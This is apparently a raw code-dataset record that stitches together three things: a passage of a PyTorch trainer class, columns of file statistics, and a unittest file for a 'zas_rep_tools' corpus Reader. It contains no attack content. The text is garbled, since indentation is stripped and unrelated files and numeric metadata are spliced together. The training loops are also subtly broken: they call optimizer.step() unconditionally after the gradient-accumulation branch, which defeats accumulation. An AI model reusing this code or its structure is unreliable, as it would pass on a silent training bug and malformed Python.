if i % grad_accum_every <= (grad_accum_every - 1):
loss.backward()
if i % grad_accum_every == (grad_accum_every - 1):
optimizer.step()
optimizer.zero_grad()
else:
loss.backward()
optimizer.step()
optimizer.zero_grad()
batch_loss = loss.item()
optimizer.step()
optimizer.zero_grad()
self.writer.add_scalar('batch_loss/train', batch_loss, epoch * len(train_loader) + i)
cum_loss += batch_loss
epoch_loss = cum_loss / len(train_loader)
self.writer.add_scalar('epoch_loss/train', epoch_loss, epoch)
print(f'epoch avg train loss: {epoch_loss}')
return epoch_loss
@torch.no_grad()
def evaluate(self, val_loader, epoch, prefix='val'):
self.model.eval()
cum_loss = 0
for i, X in tqdm.tqdm(enumerate(val_loader), total=len(val_loader),
mininterval=0.5, desc=f'epoch {epoch} evaluation'):
loss = self.model(X)
cum_loss += loss.item()
epoch_loss = cum_loss / len(val_loader)
if self.writer is not None:
self.writer.add_scalar(f'epoch_loss/{prefix}', epoch_loss, epoch)
print(f'epoch avg {prefix} loss: {epoch_loss:.3f}')
return epoch_loss
@torch.no_grad()
def predict(self, data_loader, epoch, device, prefix="val"):
self.model.eval()
y_score = torch.tensor([]).to(device)
y_true = torch.tensor([]).to(device)
for i, X in tqdm.tqdm(enumerate(data_loader), total=len(data_loader),
mininterval=0.5, desc=f'epoch {epoch} prediction'):
targets = X[-1]
y_true = torch.cat((y_true, targets))
if self.clf_or_reg == 'clf':
logits = self.model(X, predict=True)
y_score = torch.cat((y_score, F.softmax(logits, dim=1)))
elif self.clf_or_reg == 'reg':
preds = self.model(X, predict=True)
y_score = torch.cat((y_score, preds))
y_true = y_true.cpu()
y_score = y_score.cpu()
metrics = {}
if self.clf_or_reg == 'clf':
acc = accuracy_score(y_true, torch.argmax(y_score, dim=1), normalize=True)
bal_acc = balanced_accuracy_score(y_true, torch.argmax(y_score, dim=1))
roc_auc = roc_auc_score(y_true, y_score[:, 1])
metrics = {'acc': acc, 'bal_acc': bal_acc, 'roc_auc': roc_auc}
if self.writer is not None:
self.writer.add_scalar(prefix + '/acc', acc, epoch)
self.writer.add_scalar(prefix + '/bal_acc', bal_acc, epoch)
self.writer.add_scalar(prefix + '/roc_auc', roc_auc, epoch)
print(f'epoch {prefix}/roc_auc = {roc_auc}, {prefix}/bal_acc = {bal_acc}, {prefix}/acc = {acc}')
elif self.clf_or_reg == 'reg':
mse = mean_squared_error(y_true, y_score)
r2 = r2_score(y_true, y_score)
exp_var = explained_variance_score(y_true, y_score)
metrics = {"mse": mse, "r2": r2, "exp_var": exp_var}
if self.writer is not None:
self.writer.add_scalar(prefix + '/mse', mse, epoch)
self.writer.add_scalar(prefix + '/r2', r2, epoch)
self.writer.add_scalar(prefix + '/exp_var', exp_var, epoch)
print(f'epoch {prefix}/mse = {mse}, {prefix}/r2 = {r2}, {prefix}/exp_var = {exp_var}')
return y_score, y_true, metrics
@torch.no_grad()
def write_embeddings(self, step, mappings, labeller, seq_len, device):
self.model.eval()
tokens = list(mappings.top_n_train_tokens(2000).keys())
x = torch.tensor(tokens, dtype=torch.int)
z = torch.Tensor().to(device)
for x_part in torch.split(x, seq_len):
x_part = x_part.to(device)
z_part = self.model.net.token_emb(x_part)
z = torch.cat((z, z_part))
metadata = [label for label in map(labeller.token2label, x.cpu().numpy())]
self.writer.add_embedding(z,
metadata=metadata,
global_step=step,
tag='token_embeddings')
class BaselineMethods:
def __init__(self, model, writer, clf_or_reg='clf'):
self.model = model
self.writer = writer
self.clf_or_reg = clf_or_reg
def train(self, train_loader, optimizer, epoch, grad_accum_every=1):
self.model.train()
cum_loss = 0
for i, X in tqdm.tqdm(enumerate(train_loader), total=len(train_loader),
mininterval=0.5, desc=f'epoch {epoch} training'):
loss = self.model(X)
if grad_accum_every > 1:
if i % grad_accum_every <= (grad_accum_every - 1):
loss.backward()
if i % grad_accum_every == (grad_accum_every - 1):
optimizer.step()
optimizer.zero_grad()
else:
loss.backward()
optimizer.step()
optimizer.zero_grad()
batch_loss = loss.item()
optimizer.step()
optimizer.zero_grad()
self.writer.add_scalar('batch_loss/train', batch_loss, epoch * len(train_loader) + i)
cum_loss += batch_loss
epoch_loss = cum_loss / len(train_loader)
self.writer.add_scalar('epoch_loss/train', epoch_loss, epoch)
print(f'epoch avg train loss: {epoch_loss}')
return epoch_loss
@torch.no_grad()
def evaluate(self, val_loader, epoch, prefix="val"):
self.model.eval()
cum_loss = 0
for i, X in tqdm.tqdm(enumerate(val_loader), total=len(val_loader),
mininterval=0.5, desc=f'epoch {epoch} evaluation'):
loss = self.model(X)
cum_loss += loss.item()
epoch_loss = cum_loss / len(val_loader)
self.writer.add_scalar(f'epoch_loss/{prefix}', epoch_loss, epoch)
print(f'epoch avg {prefix} loss: {epoch_loss}')
return epoch_loss
@torch.no_grad()
def predict(self, data_loader, epoch, device, prefix="val"):
self.model.eval()
y_score = torch.tensor([]).to(device)
y_true = torch.tensor([]).to(device)
for i, X in tqdm.tqdm(enumerate(data_loader), total=len(data_loader),
mininterval=0.5, desc=f'epoch {epoch} prediction'):
targets = X[-1]
y_true = torch.cat((y_true, targets))
if self.clf_or_reg == 'clf':
logits = self.model(X, predict=True)
y_score = torch.cat((y_score, F.softmax(logits, dim=1)))
elif self.clf_or_reg == 'reg':
preds = self.model(X, predict=True)
y_score = torch.cat((y_score, preds))
y_true = y_true.cpu()
y_score = y_score.cpu()
metrics = {}
if self.clf_or_reg == 'clf':
acc = accuracy_score(y_true, torch.argmax(y_score, dim=1), normalize=True)
bal_acc = balanced_accuracy_score(y_true, torch.argmax(y_score, dim=1))
roc_auc = roc_auc_score(y_true, y_score[:, 1])
metrics = {'acc': acc, 'bal_acc': bal_acc, 'roc_auc': roc_auc}
self.writer.add_scalar(prefix + '/acc', acc, epoch)
self.writer.add_scalar(prefix + '/bal_acc', bal_acc, epoch)
self.writer.add_scalar(prefix + '/roc_auc', roc_auc, epoch)
self.writer.add_pr_curve(prefix + '/pr_curve', y_true, y_score[:, 1], epoch)
print(f'epoch {prefix}/roc_auc = {roc_auc}, {prefix}/bal_acc = {bal_acc}, {prefix}/acc = {acc}')
elif self.clf_or_reg == 'reg':
mse = mean_squared_error(y_true, y_score)
r2 = r2_score(y_true, y_score)
exp_var = explained_variance_score(y_true, y_score)
metrics = {"mse": mse, "r2": r2, "exp_var": exp_var}
self.writer.add_scalar(prefix + '/mse', mse, epoch)
self.writer.add_scalar(prefix + '/r2', r2, epoch)
self.writer.add_scalar(prefix + '/exp_var', exp_var, epoch)
print(f'epoch {prefix}/mse = {mse}, {prefix}/r2 = {r2}, {prefix}/exp_var = {exp_var}')
return y_score, y_true, metrics
| 44.788162
| 108
| 0.573972
| 1,865
| 14,377
| 4.156568
| 0.077212
| 0.04644
| 0.048633
| 0.063725
| 0.910604
| 0.888932
| 0.888932
| 0.867776
| 0.828947
| 0.820949
| 0
| 0.008556
| 0.308966
| 14,377
| 320
| 109
| 44.928125
| 0.771716
| 0
| 0
| 0.858657
| 0
| 0.014134
| 0.095987
| 0.013216
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04947
| false
| 0
| 0.014134
| 0
| 0.106007
| 0.035336
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d998cb9256cbcf293a7baa2fd2fe919d200c55be
| 31,385
|
py
|
Python
|
zas_rep_tools/tests/test_reader.py
|
savin-berlin/zas-rep-tools
|
fcdaa2f70ee1b6a4124292ae42e3c9d508eb0b28
|
[
"MIT"
] | null | null | null |
zas_rep_tools/tests/test_reader.py
|
savin-berlin/zas-rep-tools
|
fcdaa2f70ee1b6a4124292ae42e3c9d508eb0b28
|
[
"MIT"
] | null | null | null |
zas_rep_tools/tests/test_reader.py
|
savin-berlin/zas-rep-tools
|
fcdaa2f70ee1b6a4124292ae42e3c9d508eb0b28
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# : Tests for XXX Module
# Author:
# c(Developer) -> {'Egor Savin'}
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
###Programm Info######
#
#
#
#
#
import unittest
import os
import logging
import codecs
import sure
import copy
from nose.plugins.attrib import attr
from testfixtures import tempdir, TempDirectory
from distutils.dir_util import copy_tree
#from zas_rep_tools.src.classes.configer import Configer
from zas_rep_tools.src.classes.reader import Reader
from zas_rep_tools.src.utils.debugger import p, wipd, wipdn, wipdl, wipdo
from zas_rep_tools.src.utils.helpers import LenGen, path_to_zas_rep_tools, get_number_of_streams_adjust_cpu
from zas_rep_tools.src.utils.basetester import BaseTester
class TestZASreaderReader(BaseTester,unittest.TestCase):
_multiprocess_can_split_ = True
#_multiprocess_shared_ = True
#@classmethod
def setUp(self):
#p(str(super))
super(type(self), self).setUp()
#super(BaseTester, self).__init__()
#p(self.__dict__)
#@classmethod
def tearDown(self):
super(type(self), self).tearDown()
####################################################################################################
####################################################################################################
###################### START STABLE TESTS #########################################################
####################################################################################################
####################################################################################################
###################INITIALISATION:000############################################
###### xxx: 000 ######
##### xx :0== ######
@attr(status='stable')
#@wipd
def test_reader_initialisation_000(self):
self.blogger_corpus()
reader = Reader(os.path.join(self.tempdir_blogger_corp, self.txt_blogger_small_fake_set), "txt", regex_template="blogger", mode=self.mode)
reader.should.be.a(Reader)
##### throws_exceptions:050 ######
#################################Beginn##############################################
############################INTERN METHODS###########################################
#####################################################################################
################### :100############################################
###### ***** ######
#@attr(status='stable')
#@wipd
#def test_XXX_name_100(self):
##self.logger_initialisation()
# pass
###### ***** ######
###### ***** ######
#################################END#################################################
############################INTERN METHODS###########################################
#####################################################################################
#################################Beginn##############################################
############################EXTERN METHODS###########################################
#####################################################################################
#{'text': u"urlLink Drawing Game It's PICTIONARY. It's very cool.", 'stern': 'Pisces', 'working_area': 'indUnk', 'age': '24', 'number': '416465', 'gender': 'male'}
################### :500############################################
###### TXT ######
@attr(status='stable')
#@wipd
def test_lazyreader_from_txt_in_zip_500(self):
self.blogger_corpus()
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp, self.txt_blogger_small_fake_set), "txt", regex_template="blogger", mode=self.mode, read_from_zip=True, end_file_marker=end_file_marker)
for data in reader.getlazy():
#p(data)
if data == end_file_marker:
continue
assert isinstance(data, dict)
assert len(data) == 6
assert 'text' in data
assert 'star_constellation' in data
assert 'working_area' in data
assert 'age' in data
assert 'id' in data
assert 'gender' in data
#p(data)
###### TXT ######
@attr(status='stable')
#@wipd
def test_lazyreader_from_txt_500(self):
self.blogger_corpus()
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp, self.txt_blogger_small_fake_set), "txt", regex_template="blogger", mode=self.mode, end_file_marker=end_file_marker)
for data in reader.getlazy():
#p(data)
if data == end_file_marker:
continue
assert isinstance(data, dict)
assert len(data) == 6
assert 'text' in data
assert 'star_constellation' in data
assert 'working_area' in data
assert 'age' in data
assert 'id' in data
assert 'gender' in data
#p(data)
@attr(status='stable')
#@wipd
def test_lazyreader_from_txt_for_given_colnames_501(self):
self.blogger_corpus()
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp, self.txt_blogger_small_fake_set), "txt", regex_template="blogger", mode=self.mode, end_file_marker=end_file_marker)
for data in reader.getlazy(colnames=["text", 'star_constellation', 'gender']):
if data == end_file_marker:
continue
assert isinstance(data, dict)
assert len(data) == 3
assert 'text' in data
assert 'star_constellation' in data
assert 'gender' in data
#p(data)
###### csv ######
@attr(status='stable')
#@wipd
def test_lazyreader_from_csv_with_ascii_502(self):
self.blogger_corpus()
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp, self.csv_blogger_small_fake_set), "csv", mode=self.mode,end_file_marker=end_file_marker)
for data in reader.getlazy():
#p(data)
if data == end_file_marker:
continue
assert isinstance(data, dict)
assert len(data) == len(self.configer.docs_row_values(token=True, unicode_str=True)["blogger"][0])
assert 'text' in data
assert 'star_constellation' in data
assert 'working_area' in data
assert 'age' in data
assert 'id' in data
assert 'gender' in data
@attr(status='stable')
#@wipd
def test_lazyreader_from_csv_with_utf8_503(self):
self.blogger_corpus()
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp, self.csv_blogger_hightrepetativ_set ), "csv", mode=self.mode, end_file_marker=end_file_marker)
for data in reader.getlazy():
if data == end_file_marker:
continue
assert isinstance(data, dict)
assert len(data) == len(self.configer.docs_row_values(token=True, unicode_str=True)["blogger"][0])
assert 'text' in data
assert 'star_constellation' in data
assert 'working_area' in data
assert 'age' in data
assert 'id' in data
assert 'gender' in data
@attr(status='stable')
#@wipd
def test_lazyreader_from_csv_for_given_colnames_504(self):
self.blogger_corpus()
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp, self.csv_blogger_small_fake_set), "csv", mode=self.mode, end_file_marker=end_file_marker)
for data in reader.getlazy(colnames=["text", 'star_constellation', 'gender']):
#p(data)
if data == end_file_marker:
continue
assert isinstance(data, dict)
assert len(data) == 3
assert 'text' in data
assert 'star_constellation' in data
assert 'gender' in data
###### XML ######
@attr(status='stable')
#@wipd
def test_lazyreader_from_xml_with_ascii_505(self):
self.blogger_corpus()
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp, self.xml_blogger_small_fake_set), "xml", mode=self.mode, end_file_marker=end_file_marker)
#p(reader.getlazy())
#p(len(reader.getlazy()))
for data in reader.getlazy():
if data == end_file_marker:
continue
#p(data)
#p(type(data))
assert isinstance(data, dict)
assert len(data) == 6
assert 'text' in data
assert 'star_constellation' in data
assert 'working_area' in data
assert 'age' in data
assert 'id' in data
assert 'gender' in data
@attr(status='stable')
#@wipd
def test_lazyreader_from_xml_with_utf8_506(self):
self.blogger_corpus()
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp, self.xml_blogger_hightrepetativ_set), "xml", mode=self.mode,end_file_marker=end_file_marker)
for data in reader.getlazy():
if data == end_file_marker:
continue
assert isinstance(data, dict)
assert len(data) == 6
assert 'text' in data
assert 'star_constellation' in data
assert 'working_area' in data
assert 'age' in data
assert 'id' in data
assert 'gender' in data
@attr(status='stable')
#@wipd
def test_lazyreader_from_xml_for_given_colnames_507(self):
self.blogger_corpus()
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp, self.xml_blogger_small_fake_set), "xml", mode=self.mode, end_file_marker=end_file_marker)
#reader = Reader(os.path.join(os.path.join(self.path_to_zas_rep_tools,self.path_to_test_sets_for_blogger_Corpus), self.xml_blogger_small_fake_set), "xml", mode=self.mode)
for data in reader.getlazy(colnames=["text", 'star_constellation', 'gender']):
if data == end_file_marker:
continue
assert isinstance(data, dict)
assert len(data) == 3
assert 'text' in data
assert 'star_constellation' in data
assert 'gender' in data
###### JSON ######
@attr(status='stable')
#@wipd
def test_lazyreader_from_json_with_ascii_508(self):
self.blogger_corpus()
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp, self.json_blogger_small_fake_set), "json", mode=self.mode, end_file_marker=end_file_marker)
for data in reader.getlazy():
#p(data, "data")
if data == end_file_marker:
continue
assert isinstance(data, dict)
assert len(data) == 6
assert 'text' in data
assert 'star_constellation' in data
assert 'working_area' in data
assert 'age' in data
assert 'id' in data
assert 'gender' in data
@attr(status='stable')
#@wipd
def test_lazyreader_from_json_with_utf8_509(self):
self.blogger_corpus()
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp, self.json_blogger_hightrepetativ_set ), "json", mode=self.mode, end_file_marker=end_file_marker)
for data in reader.getlazy():
if data == end_file_marker:
continue
assert isinstance(data, dict)
assert len(data) == 6
assert 'text' in data
assert 'star_constellation' in data
assert 'working_area' in data
assert 'age' in data
assert 'id' in data
assert 'gender' in data
@attr(status='stable')
#@wipd
def test_lazyreader_from_json_for_given_colnames_510(self):
self.blogger_corpus()
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp, self.json_blogger_small_fake_set), "json", mode=self.mode, end_file_marker=end_file_marker)
for data in reader.getlazy(colnames=["text", 'star_constellation', 'gender']):
if data == end_file_marker:
continue
assert isinstance(data, dict)
assert len(data) == 3
assert 'text' in data
assert 'star_constellation' in data
assert 'gender' in data
@attr(status='stable')
#@wipd
def test_lazyreader_from_twitter_json_with_utf8_511(self):
self.twitter_corpus()
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_twitter_corp, self.json_twitter_set), "json", formatter_name="TwitterStreamAPI", mode=self.mode, end_file_marker=end_file_marker)
for data in reader.getlazy():
if data == end_file_marker:
continue
if data:
#p(data, c="r")
assert isinstance(data, dict)
#p(data["text"])
assert 'text' in data
assert 'u_lang' in data
assert 'id' in data
assert 'u_id' in data
@attr(status='stable')
#@wipd
def test_lazyreader_from_twitter_json_for_given_colnames_512(self):
self.twitter_corpus()
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_twitter_corp, self.json_twitter_set), "json", formatter_name="TwitterStreamAPI", mode=self.mode, end_file_marker=end_file_marker)
for data in reader.getlazy(colnames=["text"]):
if data == end_file_marker:
continue
if data:
assert isinstance(data, dict)
assert len(data)==1
assert 'text' in data
#@attr(status='stable')
#@wipd
def test_lazyreader_from_sifter_twitter_csv_with_utf8_513(self):
self.twitter_corpus()
end_file_marker = -1
#self.mode = "prod+"
reader = Reader(os.path.join(self.tempdir_twitter_corp, "CSV/zas-rep-tool/sifter"), "csv", formatter_name="sifter", mode=self.mode, end_file_marker=end_file_marker)
for data in reader.getlazy(csvdelimiter=";"):
if data == end_file_marker:
continue
if data:
#p(data, c="r")
assert isinstance(data, dict)
#p(data["text"])
assert 'text' in data
assert 'u_lang' in data
assert 'id' in data
assert 'u_id' in data
###### ZIPs 515######
@attr(status='stable')
#@wipd
def test_getlazy_many_streams_from_csv_also_getted_from_zips_516(self):
self.blogger_corpus()
# Test 1: Check if number of getted files is correct
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp), "csv", mode=self.mode, read_from_zip=True, end_file_marker=end_file_marker, send_end_file_marker=True)
number_of_found_files = reader._get_number_of_left_over_files()
if number_of_found_files < 3:
assert False
if reader.files_number_in_zips != len(reader.files_to_read_orig):
## for this, it is important that the main folder of the test cases should be zipped!! That there is the same number of files
assert False
number_getted_files = len([row for gen in reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5) for row in gen if row ==end_file_marker])
if number_of_found_files != number_getted_files:
assert False
#p((number_of_found_files, number_getted_files), "number_of_found_files != number_getted_files")
# Test 2: check if right number of streams will be returned
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5)).should.be.equal(get_number_of_streams_adjust_cpu(5, number_of_found_files, 4))
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=3)).should.be.equal(get_number_of_streams_adjust_cpu(3, number_of_found_files, 4))
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=2)).should.be.equal(get_number_of_streams_adjust_cpu(2, number_of_found_files, 4))
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=1)).should.be.equal(get_number_of_streams_adjust_cpu(1, number_of_found_files, 4))
i = 0
for gen in reader.getlazy(stream_number=1000,adjust_to_cpu=True, min_files_pro_stream=1):
for row_dict in gen:
#i+=1
if row_dict == end_file_marker:
i+=1
continue
#p(row_dict)
assert isinstance(row_dict, dict)
#assert len(row_dict) == 6
assert 'text' in row_dict
assert 'star_constellation' in row_dict
assert 'working_area' in row_dict
assert 'age' in row_dict
assert 'id' in row_dict
assert 'gender' in row_dict
assert number_of_found_files == i
@attr(status='stable')
#@wipdl
def test_getlazy_many_streams_from_xml_also_getted_from_zips_517(self):
self.blogger_corpus()
# Test 1: Check if number of getted files is correct
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp), "xml", mode=self.mode, read_from_zip=True, end_file_marker=end_file_marker, send_end_file_marker=True)
number_of_found_files = reader._get_number_of_left_over_files()
if number_of_found_files < 3:
assert False
if reader.files_number_in_zips != len(reader.files_to_read_orig):
## for this, it is important that the main folder of the test cases should be zipped!! That there is the same number of files
assert False
number_getted_files = len([row for gen in reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5) for row in gen if row ==end_file_marker])
if number_of_found_files != number_getted_files:
assert False
#p((number_of_found_files, number_getted_files), "number_of_found_files != number_getted_files")
# Test 2: check if right number of streams will be returned
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5)).should.be.equal(get_number_of_streams_adjust_cpu(5, number_of_found_files, 4))
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=3)).should.be.equal(get_number_of_streams_adjust_cpu(3, number_of_found_files, 4))
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=2)).should.be.equal(get_number_of_streams_adjust_cpu(2, number_of_found_files, 4))
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=1)).should.be.equal(get_number_of_streams_adjust_cpu(1, number_of_found_files, 4))
i = 0
for gen in reader.getlazy(stream_number=1000,adjust_to_cpu=True, min_files_pro_stream=1):
for row_dict in gen:
#p(row_dict)
#i+=1
if row_dict == end_file_marker:
i+=1
continue
assert isinstance(row_dict, dict)
assert len(row_dict) == 6
assert 'text' in row_dict
assert 'star_constellation' in row_dict
assert 'working_area' in row_dict
assert 'age' in row_dict
assert 'id' in row_dict
assert 'gender' in row_dict
assert number_of_found_files == i
@attr(status='stable')
#@wipd
def test_getlazy_many_streams_from_txt_also_getted_from_zips_518(self):
self.blogger_corpus()
# Test 1: Check if number of getted files is correct
end_file_marker = -1
#p(self.mode, c="r")
reader = Reader(os.path.join(self.tempdir_blogger_corp), "txt", mode=self.mode, read_from_zip=True, end_file_marker=end_file_marker, send_end_file_marker=True, regex_template="blogger")
number_of_found_files = reader._get_number_of_left_over_files()
if number_of_found_files < 3:
assert False
if reader.files_number_in_zips != len(reader.files_to_read_orig):
## for this, it is important that the main folder of the test cases should be zipped!! That there is the same number of files
assert False
number_getted_files = len([row for gen in reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5) for row in gen if row ==end_file_marker])
if number_of_found_files != number_getted_files:
assert False
#p((number_of_found_files, number_getted_files), "number_of_found_files != number_getted_files")
# Test 2: check if right number of streams will be returned
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5)).should.be.equal(get_number_of_streams_adjust_cpu(5, number_of_found_files, 4))
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=3)).should.be.equal(get_number_of_streams_adjust_cpu(3, number_of_found_files, 4))
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=2)).should.be.equal(get_number_of_streams_adjust_cpu(2, number_of_found_files, 4))
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=1)).should.be.equal(get_number_of_streams_adjust_cpu(1, number_of_found_files, 4))
i = 0
for gen in reader.getlazy(stream_number=1000,adjust_to_cpu=True, min_files_pro_stream=1):
for row_dict in gen:
#p(row_dict)
#i+=1
if row_dict == end_file_marker:
i+=1
continue
assert isinstance(row_dict, dict)
assert len(row_dict) == 6
assert 'text' in row_dict
assert 'star_constellation' in row_dict
assert 'working_area' in row_dict
assert 'age' in row_dict
assert 'id' in row_dict
assert 'gender' in row_dict
assert number_of_found_files == i
@attr(status='stable')
#@wipdl
def test_getlazy_many_streams_from_json_also_getted_from_zips_519(self):
self.blogger_corpus()
# Test 1: Check if number of getted files is correct
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp), "json", mode=self.mode, read_from_zip=True, end_file_marker=end_file_marker, send_end_file_marker=True)
number_of_found_files = reader._get_number_of_left_over_files()
if number_of_found_files < 3:
assert False
if reader.files_number_in_zips != len(reader.files_to_read_orig):
## for this, it is important that the main folder of the test cases should be zipped!! That there is the same number of files
assert False
number_getted_files = len([row for gen in reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5) for row in gen if row ==end_file_marker])
if number_of_found_files != number_getted_files:
assert False
#p((number_of_found_files, number_getted_files), "number_of_found_files != number_getted_files")
# Test 2: check if right number of streams will be returned
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5)).should.be.equal(get_number_of_streams_adjust_cpu(5, number_of_found_files, 4))
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=3)).should.be.equal(get_number_of_streams_adjust_cpu(3, number_of_found_files, 4))
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=2)).should.be.equal(get_number_of_streams_adjust_cpu(2, number_of_found_files, 4))
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=1)).should.be.equal(get_number_of_streams_adjust_cpu(1, number_of_found_files, 4))
i = 0
for gen in reader.getlazy(stream_number=1000,adjust_to_cpu=True, min_files_pro_stream=1):
for row_dict in gen:
#p(row_dict)
#i+=1
if row_dict == end_file_marker:
i+=1
continue
assert isinstance(row_dict, dict)
assert len(row_dict) == 6
assert 'text' in row_dict
assert 'star_constellation' in row_dict
assert 'working_area' in row_dict
assert 'age' in row_dict
assert 'id' in row_dict
assert 'gender' in row_dict
assert number_of_found_files == i
###### parallel computing ######
@attr(status='stable')
#@wipd
def test_getlazy_many_streams_from_txt_without_given_number_of_streams_adjusted_for_current_cpu_520(self):
self.blogger_corpus()
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp, self.txt_blogger_small_fake_set), "txt", regex_template="blogger", mode=self.mode, end_file_marker=end_file_marker, send_end_file_marker=True)
number_of_found_files = reader._get_number_of_left_over_files()
#p(number_of_found_files)
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=3)).should.be.equal(get_number_of_streams_adjust_cpu(3, number_of_found_files, 4))
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=5)).should.be.equal(get_number_of_streams_adjust_cpu(3, number_of_found_files, 5))
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=3)).should.be.equal(get_number_of_streams_adjust_cpu(3, number_of_found_files, 4))
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=2)).should.be.equal(get_number_of_streams_adjust_cpu(2, number_of_found_files, 4))
len(reader.getlazy(stream_number=4, adjust_to_cpu=True, min_files_pro_stream=1)).should.be.equal(get_number_of_streams_adjust_cpu(1, number_of_found_files, 4))
i = 0
for gen in reader.getlazy(stream_number=1000,adjust_to_cpu=True, min_files_pro_stream=1):
for row_dict in gen:
if row_dict == end_file_marker:
i+=1
continue
assert isinstance(row_dict, dict)
assert len(row_dict) == 6
assert 'text' in row_dict
assert 'star_constellation' in row_dict
assert 'working_area' in row_dict
assert 'age' in row_dict
assert 'id' in row_dict
assert 'gender' in row_dict
#p((number_of_found_files, i))
assert number_of_found_files == i
@attr(status='stable')
#@wipd
def test_getlazy_many_streams_from_txt_with_given_number_of_streams_without_adjust_for_current_cpu_521(self):
self.blogger_corpus()
end_file_marker = -1
reader = Reader(os.path.join(self.tempdir_blogger_corp, self.txt_blogger_small_fake_set), "txt", regex_template="blogger", mode=self.mode, end_file_marker=end_file_marker, send_end_file_marker=True)
number_of_found_files = reader._get_number_of_left_over_files()
#p(number_of_found_files)
# Check for stream_number=3
len(reader.getlazy(stream_number=3, adjust_to_cpu=False)).should.be.equal(3)
len([rowdict for gen in reader.getlazy(stream_number=3, adjust_to_cpu=False) for rowdict in gen if end_file_marker == rowdict]).should.be.equal(number_of_found_files)
# Check for stream_number=2
#p(reader.getlazy(stream_number=2, adjust_to_cpu=False))
len(reader.getlazy(stream_number=2, adjust_to_cpu=False)).should.be.equal(2)
len([rowdict for gen in reader.getlazy(stream_number=2, adjust_to_cpu=False) for rowdict in gen if end_file_marker == rowdict]).should.be.equal(number_of_found_files)
i = 0
for gen, fname in zip(reader.getlazy(stream_number=3,adjust_to_cpu=False, min_files_pro_stream=1), reversed(reader.files_to_read_orig)):
for row_dict in gen:
if row_dict == end_file_marker:
i+=1
continue
t = codecs.open(fname, "r", encoding="utf-8").read()
#p((row_dict["text"],t))
assert row_dict["text"] == t
assert isinstance(row_dict, dict)
assert len(row_dict) == 6
assert 'text' in row_dict
assert 'star_constellation' in row_dict
assert 'working_area' in row_dict
assert 'age' in row_dict
assert 'id' in row_dict
assert 'gender' in row_dict
assert number_of_found_files == i
#################################END##################################################
############################EXTERN METHODS############################################
######################################################################################
####################################################################################################
####################################################################################################
###################### STOP STABLE TESTS #########################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
###################### START WORK_IN_PROGRESS (wipd) TESTS #########################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
###################### STOP WORK_IN_PROGRESS (wipd) TESTS #########################################
####################################################################################################
####################################################################################################
| 40.031888
| 206
| 0.574415
| 3,865
| 31,385
| 4.340233
| 0.064424
| 0.045782
| 0.074396
| 0.057943
| 0.897824
| 0.887273
| 0.874098
| 0.872548
| 0.863368
| 0.840238
| 0
| 0.012496
| 0.237629
| 31,385
| 783
| 207
| 40.083014
| 0.688594
| 0.102246
| 0
| 0.851064
| 0
